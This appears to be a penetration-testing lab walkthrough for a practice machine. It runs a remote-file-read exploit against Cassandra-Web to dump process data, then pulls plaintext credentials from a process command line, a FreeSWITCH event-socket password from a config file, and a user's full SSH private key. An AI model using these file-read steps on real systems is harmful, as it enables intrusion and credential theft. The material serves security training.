Cassandra-Web Remote File Read
The target Cassandra-Web application has been confirmed to be vulnerable to Remote File Read vulnerability
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 remote-file-read.py $IP /proc/sched_debug
Sched Debug Version: v0.11, 4.19.0-21-amd64 #1
ktime : 5085656.578057
sched_clk : 5085658.769965
cpu_clk : 5085660.352513
jiffies : 4296163682
sched_clock_stable() : 1
sysctl_sched
.sysctl_sched_latency : 6.000000
.sysctl_sched_min_granularity : 0.750000
.sysctl_sched_wakeup_granularity : 1.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 4118331
.sysctl_sched_tunable_scaling : 1 (logaritmic)
cpu#0, 2649.999 MHz
.nr_running : 1
.load : 1048576
.nr_switches : 10093330
.nr_load_updates : 1061580
.nr_uninterruptible : 0
.next_balance : 4294.892296
.curr->pid : 981
.clock : 5085660.040643
.clock_task : 5085660.040643
.cpu_load[0] : 18
.cpu_load[1] : 11
.cpu_load[2] : 6
.cpu_load[3] : 4
.cpu_load[4] : 3
.avg_idle : 1000000
.max_idle_balance_cost : 500000
cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 48158.179805
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.runnable_weight : 1048576
.load_avg : 31
.runnable_load_avg : 18
.util_avg : 20
.util_est_enqueued : 9
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.194131
.rt_runtime : 950.000000
dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 47730.612582 3800 120 0.000000 755.980224 0.000000 0 0 /
S kthreadd 2 47664.271440 153 120 0.000000 1.070953 0.000000 0 0 /
I rcu_gp 3 13.961226 2 100 0.000000 0.002220 0.000000 0 0 /
I rcu_par_gp 4 15.961651 2 100 0.000000 0.001420 0.000000 0 0 /
I kworker/0:0H 6 19.962243 4 100 0.000000 0.003871 0.000000 0 0 /
I kworker/0:1H 8 48155.120775 122448 100 0.000000 713.601788 0.000000 0 0 /
I mm_percpu_wq 9 22.031344 2 100 0.000000 0.001398 0.000000 0 0 /
S ksoftirqd/0 10 48155.202614 110975 120 0.000000 765.194084 0.000000 0 0 /
I rcu_sched 11 48155.226125 247745 120 0.000000 904.741518 0.000000 0 0 /
I rcu_bh 12 28.033208 2 120 0.000000 0.000918 0.000000 0 0 /
S migration/0 13 0.000000 1277 0 0.000000 6.429847 0.000000 0 0 /
I kworker/0:1 14 48155.404970 62406 120 0.000000 1305.181881 0.000000 0 0 /
S cpuhp/0 15 1186.237618 10 120 0.000000 0.065693 0.000000 0 0 /
S kdevtmpfs 16 1174.605802 135 120 0.000000 0.329487 0.000000 0 0 /
I netns 17 40.057542 2 100 0.000000 0.002000 0.000000 0 0 /
S kauditd 18 1142.533633 5 120 0.000000 0.026280 0.000000 0 0 /
S khungtaskd 19 48145.360589 44 120 0.000000 2.966110 0.000000 0 0 /
S oom_reaper 20 46.059272 2 120 0.000000 0.001040 0.000000 0 0 /
I writeback 21 48.059967 2 100 0.000000 0.001810 0.000000 0 0 /
S kcompactd0 22 50.061140 2 120 0.000000 0.001640 0.000000 0 0 /
S ksmd 23 52.062972 2 125 0.000000 0.001640 0.000000 0 0 /
S khugepaged 24 48153.219113 511 139 0.000000 61.949930 0.000000 0 0 /
I crypto 25 56.062030 2 100 0.000000 0.001230 0.000000 0 0 /
I kintegrityd 26 58.062509 2 100 0.000000 0.001200 0.000000 0 0 /
I kblockd 27 60.063655 2 100 0.000000 0.002570 0.000000 0 0 /
I edac-poller 28 137.371122 2 100 0.000000 0.002020 0.000000 0 0 /
I devfreq_wq 29 138.871787 2 100 0.000000 0.001869 0.000000 0 0 /
S watchdogd 30 0.000000 2 0 0.000000 0.001440 0.000000 0 0 /
S kswapd0 31 46717.588819 1433 120 0.000000 1021.545749 0.000000 0 0 /
I kthrotld 49 502.786056 2 100 0.000000 0.002331 0.000000 0 0 /
S irq/24-pciehp 50 0.000000 2 49 0.000000 0.004710 0.000000 0 0 /
S irq/25-pciehp 51 0.000000 2 49 0.000000 0.002000 0.000000 0 0 /
S irq/26-pciehp 52 0.000000 2 49 0.000000 0.001960 0.000000 0 0 /
S irq/27-pciehp 53 0.000000 2 49 0.000000 0.002229 0.000000 0 0 /
S irq/28-pciehp 54 0.000000 2 49 0.000000 0.001880 0.000000 0 0 /
S irq/29-pciehp 55 0.000000 2 49 0.000000 0.001760 0.000000 0 0 /
S irq/30-pciehp 56 0.000000 2 49 0.000000 0.001740 0.000000 0 0 /
S irq/31-pciehp 57 0.000000 2 49 0.000000 0.001720 0.000000 0 0 /
S irq/32-pciehp 58 0.000000 2 49 0.000000 0.001720 0.000000 0 0 /
S irq/33-pciehp 59 0.000000 2 49 0.000000 0.001770 0.000000 0 0 /
S irq/34-pciehp 60 0.000000 2 49 0.000000 0.001860 0.000000 0 0 /
S irq/35-pciehp 61 0.000000 2 49 0.000000 0.001720 0.000000 0 0 /
S irq/36-pciehp 62 0.000000 2 49 0.000000 0.001760 0.000000 0 0 /
S irq/37-pciehp 63 0.000000 2 49 0.000000 0.001760 0.000000 0 0 /
S irq/38-pciehp 64 0.000000 2 49 0.000000 0.001770 0.000000 0 0 /
S irq/39-pciehp 65 0.000000 2 49 0.000000 0.001760 0.000000 0 0 /
S irq/40-pciehp 66 0.000000 2 49 0.000000 0.001729 0.000000 0 0 /
S irq/41-pciehp 67 0.000000 2 49 0.000000 0.001950 0.000000 0 0 /
S irq/42-pciehp 68 0.000000 2 49 0.000000 0.002380 0.000000 0 0 /
S irq/43-pciehp 69 0.000000 2 49 0.000000 0.001800 0.000000 0 0 /
S irq/44-pciehp 70 0.000000 2 49 0.000000 0.002100 0.000000 0 0 /
S irq/45-pciehp 71 0.000000 2 49 0.000000 0.001890 0.000000 0 0 /
S irq/46-pciehp 72 0.000000 2 49 0.000000 0.001770 0.000000 0 0 /
S irq/47-pciehp 73 0.000000 2 49 0.000000 0.001940 0.000000 0 0 /
S irq/48-pciehp 74 0.000000 2 49 0.000000 0.001700 0.000000 0 0 /
S irq/49-pciehp 75 0.000000 2 49 0.000000 0.002071 0.000000 0 0 /
S irq/50-pciehp 76 0.000000 2 49 0.000000 0.001890 0.000000 0 0 /
S irq/51-pciehp 77 0.000000 2 49 0.000000 0.001800 0.000000 0 0 /
S irq/52-pciehp 78 0.000000 2 49 0.000000 0.001770 0.000000 0 0 /
S irq/53-pciehp 79 0.000000 2 49 0.000000 0.001789 0.000000 0 0 /
S irq/54-pciehp 80 0.000000 2 49 0.000000 0.001870 0.000000 0 0 /
S irq/55-pciehp 81 0.000000 2 49 0.000000 0.001810 0.000000 0 0 /
I kstrp 82 599.806258 2 100 0.000000 0.001990 0.000000 0 0 /
S scsi_eh_0 123 722.838065 2 120 0.000000 0.002640 0.000000 0 0 /
I scsi_tmf_0 124 723.838893 2 100 0.000000 0.002822 0.000000 0 0 /
Ivmw_pvscsi_wq_0 126 724.590862 2 100 0.000000 0.003680 0.000000 0 0 /
I ata_sff 127 725.299552 2 100 0.000000 0.003180 0.000000 0 0 /
I kworker/u2:1 129 28103.475559 240 120 0.000000 5.001896 0.000000 0 0 /
S scsi_eh_1 132 1175.013700 38 120 0.000000 1.248690 0.000000 0 0 /
I scsi_tmf_1 134 728.790166 2 100 0.000000 0.002140 0.000000 0 0 /
S scsi_eh_2 135 841.632997 4 120 0.000000 10.600444 0.000000 0 0 /
I scsi_tmf_2 137 731.491682 2 100 0.000000 0.002270 0.000000 0 0 /
I kworker/u2:2 139 48154.976736 2064 120 0.000000 226.757320 0.000000 0 0 /
I kworker/u3:0 212 938.949694 2 100 0.000000 0.002101 0.000000 0 0 /
S jbd2/sda1-8 214 48154.236757 4941 120 0.000000 122.761896 0.000000 0 0 /
Iext4-rsv-conver 215 956.753940 2 100 0.000000 0.002320 0.000000 0 0 /
Ssystemd-journal 246 47731.199450 1837 120 0.000000 419.300958 0.000000 0 0 /
S systemd-udevd 266 47697.218014 930 120 0.000000 58.306563 0.000000 0 0 /
S VGAuthService 331 1195.574080 175 120 0.000000 7.662177 0.000000 0 0 /
S vmtoolsd 332 48156.378876 54995 120 0.000000 1998.217327 0.000000 0 0 /
S gmain 432 27588.418939 111 120 0.000000 0.828704 0.000000 0 0 /
I ttm_swap 371 1175.630643 2 100 0.000000 0.003610 0.000000 0 0 /
S irq/16-vmwgfx 373 0.000000 3 49 0.000000 0.011020 0.000000 0 0 /
S dbus-daemon 402 47721.882334 5170 120 0.000000 271.244117 0.000000 0 0 /
S rsyslogd 405 47602.016489 63 120 0.000000 2.636955 0.000000 0 0 /
S in:imuxsock 428 47730.542077 801 120 0.000000 18.805381 0.000000 0 0 /
S in:imklog 429 27443.280277 29 120 0.000000 4.302002 0.000000 0 0 /
S rs:main Q:Reg 440 47730.549357 820 120 0.000000 26.946232 0.000000 0 0 /
S cron 409 47729.513969 252 120 0.000000 19.091641 0.000000 0 0 /
S systemd-logind 413 47630.420816 336 120 0.000000 27.954175 0.000000 0 0 /
S ntpd 459 48154.848986 5257 120 0.000000 161.646289 0.000000 0 0 /
S ntpd 471 47571.191975 256 120 0.000000 16.324480 0.000000 0 0 /
S sshd 482 29231.847429 73 120 0.000000 9.559270 0.000000 0 0 /
S agetty 485 14528.291607 9 120 0.000000 1.808561 0.000000 0 0 /
S freeswitch 533 0.994523 5695 98 0.000000 99.151827 0.000000 0 0 /
S freeswitch 538 0.000000 5085 98 0.000000 67.966838 0.000000 0 0 /
S freeswitch 559 0.000000 1551 0 0.000000 8.355303 0.000000 0 0 /
S freeswitch 629 0.000000 9 98 0.000000 0.319979 0.000000 0 0 /
S freeswitch 631 0.000000 11454 98 0.000000 164.369429 0.000000 0 0 /
S freeswitch 640 0.000000 41428 89 0.000000 288.894187 0.000000 0 0 /
S freeswitch 642 0.000000 5083 0 0.000000 64.955672 0.000000 0 0 /
S freeswitch 646 0.000000 12 0 0.000000 4.876864 0.000000 0 0 /
S freeswitch 647 0.000000 254150 0 0.000000 2975.900683 0.000000 0 0 /
S freeswitch 648 0.000000 1 98 0.000000 0.008700 0.000000 0 0 /
S freeswitch 649 0.000000 1 98 0.000000 0.006280 0.000000 0 0 /
S apache2 573 48154.839556 5207 120 0.000000 610.135965 0.000000 0 0 /
S java 804 13479.458700 1 120 0.000000 1.085670 0.000000 0 0 /
S java 805 16371.503601 9057 120 0.000000 2119.699077 0.000000 0 0 /
S java 806 13487.239328 5 120 0.000000 0.024780 0.000000 0 0 /
S java 807 48154.202727 904 120 0.000000 65.592715 0.000000 0 0 /
S VM Thread 808 48154.793966 5642 120 0.000000 408.004390 0.000000 0 0 /
SReference Handl 809 45198.902295 15 120 0.000000 2.677732 0.000000 0 0 /
S Finalizer 810 45198.867665 19 120 0.000000 4.176282 0.000000 0 0 /
SSurrogate Locke 811 14860.913044 6 120 0.000000 0.032120 0.000000 0 0 /
SSignal Dispatch 812 13661.912306 3 120 0.000000 0.013310 0.000000 0 0 /
SC2 CompilerThre 813 48157.189157 9675 120 0.000000 5993.885445 0.000000 0 0 /
SC1 CompilerThre 814 48149.292463 9067 120 0.000000 1486.563073 0.000000 0 0 /
S Service Thread 815 45199.571454 48 120 0.000000 7.611165 0.000000 0 0 /
SVM Periodic Tas 816 48155.337458 102560 120 0.000000 1510.722406 0.000000 0 0 /
SAsyncAppender-W 818 43514.022168 1007 120 0.000000 23.936828 0.000000 0 0 /
SScheduledTasks: 819 48155.162035 53012 120 0.000000 822.148580 0.000000 0 0 /
SRMI TCP Accept- 820 14262.785835 5 120 0.000000 0.231552 0.000000 0 0 /
SRMI TCP Accept- 821 14264.648374 3 120 0.000000 0.038620 0.000000 0 0 /
SEXPIRING-MAP-RE 824 48154.963746 5090 120 0.000000 98.668994 0.000000 0 0 /
SSlabPoolCleaner 832 14666.106476 3 120 0.000000 0.106350 0.000000 0 0 /
SCOMMIT-LOG-ALLO 833 15025.443929 11 120 0.000000 4.079412 0.000000 0 0 /
SPERIODIC-COMMIT 834 48155.167915 50835 120 0.000000 601.121372 0.000000 0 0 /
SOptionalTasks:1 836 48154.874896 37488 120 0.000000 1092.584034 0.000000 0 0 /
SReference-Reape 838 48155.165165 50771 120 0.000000 541.526341 0.000000 0 0 /
SLocalPool-Clean 839 48155.159985 50778 120 0.000000 539.920557 0.000000 0 0 /
SScheduledFastTa 843 48158.179805 504257 120 0.000000 5755.600748 0.000000 0 0 /
SNonPeriodicTask 858 43501.418688 182 120 0.000000 34.454250 0.000000 0 0 /
Sread-hotness-tr 860 47529.877325 74 120 0.000000 25.703924 0.000000 0 0 /
SIndexSummaryMan 867 43525.804871 46 124 0.000000 5.892540 0.000000 0 0 /
SACCEPT-localhos 868 16066.767188 3 120 0.000000 0.090130 0.000000 0 0 /
S GossipTasks:1 869 48154.839006 5093 120 0.000000 211.800890 0.000000 0 0 /
S GossipStage:1 871 16110.669601 3 120 0.000000 0.040730 0.000000 0 0 /
SAntiEntropyStag 872 16112.167399 3 120 0.000000 0.032180 0.000000 0 0 /
SMigrationStage: 873 16113.669857 3 120 0.000000 0.030870 0.000000 0 0 /
S MiscStage:1 874 16115.175565 3 120 0.000000 0.033280 0.000000 0 0 /
SBatchlogTasks:1 876 48154.415117 1044 120 0.000000 210.214732 0.000000 0 0 /
SPendingRangeCal 878 16215.653381 7 120 0.000000 1.693420 0.000000 0 0 /
SepollEventLoopG 879 48155.093126 5443 120 0.000000 155.313654 0.000000 0 0 /
SHintsWriteExecu 881 48154.294457 1472 120 0.000000 76.369601 0.000000 0 0 /
SNative-Transpor 882 48132.319224 24012 120 0.000000 324.163278 0.000000 0 0 /
SepollEventLoopG 988 48155.110356 5522 120 0.000000 203.613241 0.000000 0 0 /
SthreadDeathWatc 989 48154.837795 5002 124 0.000000 95.158043 0.000000 0 0 /
SNative-Transpor 990 47699.022283 1936 120 0.000000 25.896570 0.000000 0 0 /
S ReadStage-3 991 27193.169052 594 120 0.000000 7.550725 0.000000 0 0 /
S ReadStage-4 992 27189.923131 219 120 0.000000 6.447971 0.000000 0 0 /
SNative-Transpor 993 27202.467967 478 120 0.000000 4.483576 0.000000 0 0 /
SNative-Transpor 994 27267.493112 657 120 0.000000 71.638581 0.000000 0 0 /
SNative-Transpor 995 27192.136521 153 120 0.000000 1.379320 0.000000 0 0 /
SNative-Transpor 996 27189.092463 440 120 0.000000 2.137807 0.000000 0 0 /
S ReadStage-11 997 27191.050062 175 120 0.000000 1.034240 0.000000 0 0 /
S ReadStage-7 998 27191.072832 228 120 0.000000 3.292925 0.000000 0 0 /
SNative-Transpor 999 27191.454060 830 120 0.000000 78.425862 0.000000 0 0 /
S ReadStage-12 1326 27192.721229 14 120 0.000000 0.635650 0.000000 0 0 /
SSharedPool-Work 1327 27193.020361 59 120 0.000000 0.175833 0.000000 0 0 /
SNative-Transpor 1328 27195.560765 293 120 0.000000 1.702908 0.000000 0 0 /
SCompactionExecu 2888 47736.983686 14 124 0.000000 2.741110 0.000000 0 0 /
SCompactionExecu 2925 47738.282832 3 124 0.000000 0.095070 0.000000 0 0 /
>R cassandra-web 981 48156.431495 9226 120 0.000000 957.758404 0.000000 0 0 /
S ruby-timer-thr 982 44131.658643 9 120 0.000000 0.087089 0.000000 0 0 /
Sexecutors.rb:78 983 17409.193951 1 120 0.000000 0.008310 0.000000 0 0 /
Sexecutors.rb:78 984 17408.374842 1 120 0.000000 0.014680 0.000000 0 0 /
Sexecutors.rb:78 985 17607.618424 2 120 0.000000 0.050580 0.000000 0 0 /
Sexecutors.rb:78 986 17534.752955 9 120 0.000000 0.055710 0.000000 0 0 /
Sio_reactor.rb:* 987 48155.139916 5504 120 0.000000 430.888333 0.000000 0 0 /
Seventmachine.r* 1953 36794.188931 1 120 0.000000 0.012310 0.000000 0 0 /
Seventmachine.r* 1954 36793.208761 2 120 0.000000 0.006530 0.000000 0 0 /
Seventmachine.r* 1955 36792.738940 2 120 0.000000 0.015090 0.000000 0 0 /
Seventmachine.r* 1956 36792.446931 2 120 0.000000 0.006910 0.000000 0 0 /
Seventmachine.r* 1957 36792.264572 2 120 0.000000 0.006950 0.000000 0 0 /
Seventmachine.r* 1958 36792.146555 2 120 0.000000 0.007410 0.000000 0 0 /
Seventmachine.r* 1959 36792.178501 8 120 0.000000 0.132560 0.000000 0 0 /
Seventmachine.r* 1960 36866.982470 6 120 0.000000 0.075990 0.000000 0 0 /
Seventmachine.r* 1961 44131.533581 6 120 0.000000 0.177799 0.000000 0 0 /
Seventmachine.r* 1962 36792.178181 2 120 0.000000 0.062010 0.000000 0 0 /
Seventmachine.r* 1963 36792.143232 2 120 0.000000 0.007130 0.000000 0 0 /
Seventmachine.r* 1964 36792.160651 2 120 0.000000 0.006450 0.000000 0 0 /
Seventmachine.r* 1965 36792.176851 2 120 0.000000 0.007980 0.000000 0 0 /
Seventmachine.r* 1966 36794.710029 1 120 0.000000 0.007800 0.000000 0 0 /
Seventmachine.r* 1967 36794.973821 1 120 0.000000 0.007670 0.000000 0 0 /
Seventmachine.r* 1968 36794.697511 1 120 0.000000 0.010080 0.000000 0 0 /
Seventmachine.r* 1969 36794.512652 1 120 0.000000 0.010060 0.000000 0 0 /
Seventmachine.r* 1970 36795.044386 1 120 0.000000 0.015650 0.000000 0 0 /
Seventmachine.r* 1971 36794.936169 1 120 0.000000 0.009550 0.000000 0 0 /
Seventmachine.r* 1972 36794.943129 2 120 0.000000 0.016510 0.000000 0 0 /
S smbd 1354 47721.651464 1682 120 0.000000 130.704420 0.000000 0 0 /
S smbd-notifyd 1356 48133.417269 166 120 0.000000 3.804760 0.000000 0 0 /
S cleanupd 1357 48154.206067 212 120 0.000000 5.194650 0.000000 0 0 /
S lpqd 1358 47198.727416 18 120 0.000000 6.716717 0.000000 0 0 /
S apache2 2488 46740.480270 39223 120 0.000000 2509.085332 0.000000 0 0 /
S apache2 2592 47402.206837 27162 120 0.000000 1768.573131 0.000000 0 0 /
S apache2 2674 46740.857577 19105 120 0.000000 1220.979419 0.000000 0 0 /
S apache2 2683 46743.146340 17737 120 0.000000 1145.730835 0.000000 0 0 /
S apache2 2733 46740.729242 11251 120 0.000000 718.844178 0.000000 0 0 /
S apache2 2789 46740.595689 5210 120 0.000000 323.534933 0.000000 0 0 /
S apache2 2790 46740.176130 4793 120 0.000000 303.653250 0.000000 0 0 /
S apache2 2793 46740.683393 4832 120 0.000000 296.387555 0.000000 0 0 /
S apache2 2797 46740.435339 3686 120 0.000000 239.432973 0.000000 0 0 /
S apache2 2814 46740.742005 1636 120 0.000000 107.233004 0.000000 0 0 /
I kworker/0:0 2874 47666.315929 158 120 0.000000 8.575305 0.000000 0 0 /
I kworker/0:2 2918 48154.303687 50 120 0.000000 2.551428 0.000000 0 0 /Checking the running process
Cassandra-Web is running with a PID of 981
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 remote-file-read.py $IP /proc/self/cmdline
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 remote-file-read.py $IP /proc/981/cmdline
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330Exfiltrating the credential for the target Cassandra-Web instance; cassie:SecondBiteTheApple330
The credential is to authenticate to the running Apache Cassandra database instance
FreeSWITCH’s mod_event_socket
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 remote-file-read.py $IP /etc/freeswitch/autoload_configs/event_socket.conf.xml
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>Apparently the password has been changed to StrongClueConEight021
SSH Private Key
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 remote-file-read.py $IP /home/cassie/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----A SSH private key was located at the home directory of the cassie user